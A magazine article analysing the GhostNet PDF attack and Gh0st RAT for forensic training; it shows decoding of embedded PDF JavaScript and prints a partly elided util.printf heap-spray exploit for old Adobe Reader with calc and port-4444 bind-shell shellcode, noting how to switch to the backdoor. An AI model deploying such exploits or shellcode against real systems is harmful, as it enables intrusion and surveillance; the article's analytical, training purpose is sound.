Reverse engineering the GhostNet PDF attack

Ghost Story


How did the GhostNet attack manage to infect computers around the world? With a shot of weird PDF magic.

By Tobias "Newroot," Hans-Peter Merkel, and Markus Feilner

Jozef Dunaj, 123RF

GhostNet is a PDF hacking tool from China that has already invaded networks belonging to the Dalai Lama and many western governments. Details of the ghost attack are gradually emerging. One government agency after another has had to hesitantly admit that, yes, it has found infected computers in its offices. Europe, Organizations in the USA, Canada, and Asia have all reported intrusions launched against security-sensitive machines. A GhostNet invasion spread like cobwebs across the Internet before reaching its maximum extent at the end of 2008.

The Adobe Reader exploit that this attack used to propagate itself was fairly old at the time, but even though admins armed with forensics tools such as Metasploit [1] quickly uncovered the problem, the exploit infested a large number of PCs around the world. And if you think only newbies could fall for an executable email attachment attack, think again. The GhostNet attack has taught us the dangers of even a simple act like opening a PDF file.

GhostNet works because Acrobat Reader automatically executes embedded JavaScript code. The JavaScript can then download more complex, malicious code from the Internet. This vulnerability, which Adobe did not fix until version 8.1.3, caused infected computers to automatically open a connection to Gh0st RAT, the GhostNet command and control center (Figure 1). We tested and explored various GhostNet components as part of developing a training curriculum for crime prevention and security offices.

Investigating the source code gave us a good deal of insight into the origin of the GhostNet exploit. The C++ code was only available in Chinese at first. Of course, the language barrier made it difficult to use the menus. Figure 1 shows the Gh0st RAT Beta 3.6 control center in a later English version.

Figure 1: Attackers can use the Gh0st RAT control center to enable the webcam, keylogger, and other features at the click of a mouse.
Keylogger, Screen Grabber, Bug, and Webcam

The Gh0st RAT control center offers a number of useful functions for managing an attack, including:

  • Total access to the compromised PC: The malware can monitor both the filesystem and the screen.
  • Input devices: the internal keylogger logs Internet activity such as online banking and password entries.
  • Area monitoring: if the infected machine happens to be a laptop, the GhostNet admin can remotely enable the internal microphone and listen in on conversations in the room.

It is also possible to enable an internal or attached Webcam, although this feature is risky for the attacker due to internal LED displays; this feature probably wasn't used very often.

GhostNet is a role model for intuitive control, and the learning curve from first steps to criminal activity is very short, but thanks to reverse engineering, admins still have a few options for protecting themselves.

Adding JavaScript to a PDF

The story of the GhostNet attack begins with a PDF file. To follow along with this discussion, you'll need a recent Linux PC with a GUI and the Metasploit security testing framework.

To understand PDF vulnerabilities, consider the app.alert method, which is sometimes used to add alerts to PDF documents.

To begin, you want the Scribus [2] desktop publishing application to create a harmless-looking PDF document and allow embedded JavaScript. After creating the normal PDF content, select Edit | Add JavaScript and add the app.alert function:

function New_Script()
{
app.alert("Hello World!");
}

After embedding the script, you then need to export the PDF. Change the No Script option in File | Export | Save as PDF | Viewer to New_Script and then save the PDF. A viewer who opens the PDF will see the message shown in Figure 2.

Figure 2: Hello World! The PDF has opened a pop-up window, courtesy of an embedded script.

Thus far, this hack might not seem so impressive, but some reverse engineering with the GhostNet PDF content will provide additional insights into the malicious code. A simple cat command shows the embedded JavaScript object (Listing 1). Line 8 contains the binary code, which you then need to convert back into readable JavaScript. Using the clipboard, transfer the code between stream and endstream to a new file, which you can call hello.bin. Then run the xxd hex editor to list the hex code as an array (Listing 2).

Listing 1: cat helloworld.pdf
01 13 0 obj
02
03 << /Length 65
04
05 /Filter /FlateDecode >>
06
07 stream
08 x09 endstream
10 endobj
11 14 0 obj
12 << /S /JavaScript /JS 13 0 R >>
13 endobj
Listing 2: xxd -i hello.bin
01 unsigned char hello_bin[] = {
02 0x78, 0xef, 0xbf, 0xbd, 0x4b, 0x2b, 0xef, 0xbf, 0xbd, 0x4b, 0x2e, 0xef,
03 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0x53, 0xef, 0xbf, 0xbd,
04 0x4b, 0x2d, 0x4d, 0x2d, 0xef, 0xbf, 0xbd, 0x4e, 0x2e, 0xef, 0xbf, 0xbd,
05 0x2c, 0x28, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0xef,
06 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0x52, 0x50, 0x50, 0x48, 0x2c, 0x28, 0xef,
07 0xbf, 0xbd, 0x4b, 0xef, 0xbf, 0xbd, 0x49, 0x2d, 0x2a, 0xef, 0xbf, 0xbd,
08 0x50, 0xef, 0xbf, 0xbd, 0x48, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0xef,
09 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0x2f, 0xef, 0xbf, 0xbd, 0x49, 0x51, 0x54,
10 0xd2, 0xb4, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0x3f, 0xef, 0xbf, 0xbd,
11 0x0a
12 };

Unfortunately, the output from xxd only provides C-style hexadecimal strings such as 0x90. JavaScript needs a different format that represents the opcodes in a form such as \x90. Metasploit's msfencode provides the necessary conversion:

cat hello.bin | /usr/local/ framework-3.2/msfencode -e generic/none -t perl -o hello.php

To make the results executable, you only need minor changes to the PHP tags, buffer declarations, and conversion function. The new hello.php file includes the shell code array in the required format (Listing 3).

Listing 3: hello.php
01 <?php
02 $buf=
03 "\x78\xef\xbf\xbd\x4b\x2b\xef\xbf\xbd\x4b\x2e\xef\xbf\xbd" .
04 "\xef\xbf\xbd\xef\xbf\xbd\x53\xef\xbf\xbd\x4b\x2d\x4d\x2d" .
05 "\xef\xbf\xbd\x4e\x2e\xef\xbf\xbd\x2c\x28\xef\xbf\xbd\xef" .
06 "\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\x52\x50\x50" .
07 "\x48\x2c\x28\xef\xbf\xbd\x4b\xef\xbf\xbd\x49\x2d\x2a\xef" .
08 "\xbf\xbd\x50\xef\xbf\xbd\x48\xef\xbf\xbd\xef\xbf\xbd\xef" .
09 "\xbf\xbd\xef\xbf\xbd\x2f\xef\xbf\xbd\x49\x51\x54\xd2\xb4" .
10 "\xef\xbf\xbd\xef\xbf\xbd\x3f\xef\xbf\xbd\x0a";
11
12 echo gzuncompress($buf);
13
14 ?>

To evaluate this code at the command line, use php-cli (a package for php-cli is available from the Debian repository. php hello.php will now recreate the JavaScript code entered in Scribus:

function Neues_Script()
{
app.alert("Hello World!");
}

The hackers behind GhostNet, who were probably well paid by some government, used exactly these techniques to compromise Windows machines via the util.prinf exploit for Acrobat Reader. A proof of concept is available [3].

The PDF document illustrates the vulnerability by means of a buffer overflow in the util.printf function. Using the same approach described in the previous example, you can use reverse engineering to analyze the embedded code by entering the command cat 2008-APSB08-19.pdf:

H??W]k?V}???A
?
?
}'T_????owg??/???Q &????H?? xh?S??av7

The next task is to extract the code, store it as exploit.bin, and then use Metasploit to create an opcode array. Just like hello.php, it then needs PHP tags, the buffer declaration, and the conversion function.

Listing 4 shows the results in the form of the converted PHP code after calling php exploit.php. Listing 4 has two arrays (shellcode1 and shellcode2), although the code only executes the first array (line 76), which performs the harmless task of launching the calculator on a Windows system.

PHP, a Spot of JavaScript, and a Buffer Overflow

Notice the util.printf function buffer overflow at the end of the JavaScript code (line 86) in Listing 4. The num variable defined before this line contains 45,000 floating point digits and thus causes the buffer overflow. But an even more interesting feature of Listing 4 is the second shellcode array. All you have to do is rename the array call by replacing the name in line 76, and the code will open a backdoor instead of launching the calculator.

The code in the second array opens TCP port 4444; you can test this by issuing a Netcat command for the port number. Patched versions of Adobe Reader are no longer vulnerable to this problem, but intruders are well aware of other bugs in Acrobat API functions.

Metasploit uses more than 100 different payloads to allow penetration testers to run backdoor functions or download malware. In our training session for crime fighters, we used the embedded download function to transfer our GhostNet Trojan to Windows PCs.

Incidentally, the Gh0st RAT control center automatically creates the Trojan. It makes no difference whether you use a manipulated PDF or an Iframe tag on a website to compromise the PC. Metasploit uses the msfpaylod program to export payloads, and these exported payloads are then converted into shellcode arrays.

Listing 4: exploit.php
01 // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2
02 http://metasploit.com
03 var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
04 "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
05 "%u4568%u4222%u2389%u7536%u1335%u4589%u7431%u346a" +
[...]
25 "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
26 "%u314e%u7475%u7038%u7765%u4370");
27
28 // win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
29 var shellcode2 = unescape ("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
30 "%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" +
31 "%u3875%u4329%u4156%u4a90%u4949%u4937%u5a67%u123a" +
[...]
70 "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
71 "%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" +
72 "%u684f%u3956%u386f%u4350");
73
74 var bigblock = unescape("%u0A0A%u0A0A");
75 var headersize = 20;
76 var slackspace = headersize + shellcode1.length;
77 while (bigblock.length < slackspace) bigblock += bigblock;
78 var fillblock = bigblock.substring(0,slackspace);
79 var block = bigblock.substring(0,bigblock.length - slackspace);
80 while (block.length + slackspace < 0x60000) block = block + block + fillblock;
81
82 var memory = new Array();
83 for (i = 0; i < 1200; i++){ memory[i] = block + shellcode1 }
84
85 var num =1299999999999999999988888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
86 util.printf("%45000f",num)

Dangerously Simple

You don't need spectacular programming skills to understand how intruders use PDFs to gain entry into vulnerable networks. Some of the most powerful exploits are hidden in innocuous places where neither experts nor endusers would ever think to look.

Adobe plugged the hole that led to the GhostNet attack, but it is only a matter of time before other PDF exploits appear in the wild.

INFO
[1] Metasploit: http://www.metasploit.com
[2] Scribus: http://www.scribus.net
[3] Proof of Concept for PDF exploit: http://milw0rm.com/sploits/2008-APSB08-19.pdf
THE AUTHOR

Hans-Peter Merkel has focused on data forensics for many years as an active member of the open source community. He trains crime fighters in Germany and Tanzania and is the founder and chair of FreiOSS and Linux4Afrika.